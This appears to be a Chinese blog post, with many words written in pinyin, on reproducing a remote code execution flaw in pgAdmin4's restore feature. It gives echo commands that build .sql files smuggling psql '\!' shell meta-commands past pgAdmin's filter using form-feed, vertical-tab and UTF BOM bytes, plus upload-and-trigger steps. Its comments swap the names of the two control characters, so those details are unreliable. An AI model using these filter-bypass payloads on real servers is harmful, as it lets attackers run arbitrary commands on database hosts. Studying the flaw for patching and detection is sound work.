哎呀，Zui近kan到一个挺有意思的漏洞，关于pgAdmin4的CVE-2025-13780。咱就是说这个漏洞让咱Ke以远程执行代码，想想就有点毛骨悚然！不过今天就来好好扒一扒，kankan怎么复现这个漏洞。

简单来说这个漏洞是pgAdmin4的一个远程代码执行问题。以前的版本在恢复功Neng中存在一个安全隐患。当用户上传SQL文件后pgAdmin会用psql程序来执行这些文件。攻击者Ke以构造恶意的SQL文件，其中包含特殊的元命令，比如`\!`或者`\i`之类的。这些命令Ke以让psql在服务器端执行任意shell命令。

比如说攻击者Ke以把一个payload注入到SQL文件中，当管理员尝试恢复该文件时就会触发远程代码执行。想想就hen可怕！

你问我为什么百度不收录？嗯... 那个那个... 哈哈！其实这也没啥特别的原因啦。可Neng就是因为内容比较技术性、比较偏向安全研究吧。百度可Nenggeng倾向于收录那些大众化的、应用场景geng广泛的文章。不过咱也别太在意这些嘛！

好啦，咱们开始动手构造Payload吧。要绕过pgAdmin的安全检测机制，需要一些技巧。

# 垂直制表符
echo -ne "SELECT ;\x0c\\! ls>/tmp/ls"> payload_ff.sql
# 换页符
echo -ne "SELECT ;\x0b\\! id>/tmp/id"> payload_vt.sql
# UTF BOM 绕过
echo -ne "\xef\xbb\xbf\\! echo utf_bom>/tmp/bom"> payload_bom.sql

上面这些命令分别利用了垂直制表符、换页符和UTF BOM等特殊字符来欺骗pgAdmin的安全检查器。 \x0c 是垂直制表符, `\x0b`是换页符, `\xef\xbb\xbf`是UTF BOM编码。

注意： br'*\\' 这种匹配规则是 pgAdmin 的内部实现细节之一, Ru果geng新了版本, 可Neng需要调整Payload才Neng生效.

准备环境： 确保你有一个运行着 pgAdmin4 的服务器 。

上传 Payload： 将上面构造好的Payload文件上传到pgAdmin的恢复功Neng中

选择格式： 在恢复界面中选择“Plain”格式 ，然后提交上传的文件

触发执行： 当 pgAdmin 开始执行恢复操作时, 你就会kan到它试图执行你的 Payload 中的 shell 命令

验证成功： Ru果一切顺利, 你会在服务器上kan到你的 shell 命令被成功执行的结果

原来 pgAdmin 对 SQL 文件进行了安全检查，Ru果发现元命令 ，就会阻止其执行。但是攻击者Ke以通过特殊字符来绕过这种检测.

通过以上步骤, 你就Ke以成功复现 CVE-2025-13780 漏洞了！ 这也说明了软件的安全的重要性嘛。平时在使用数据库管理工具的时候, 要时刻注意安全性, 及时geng新到Zui新版本.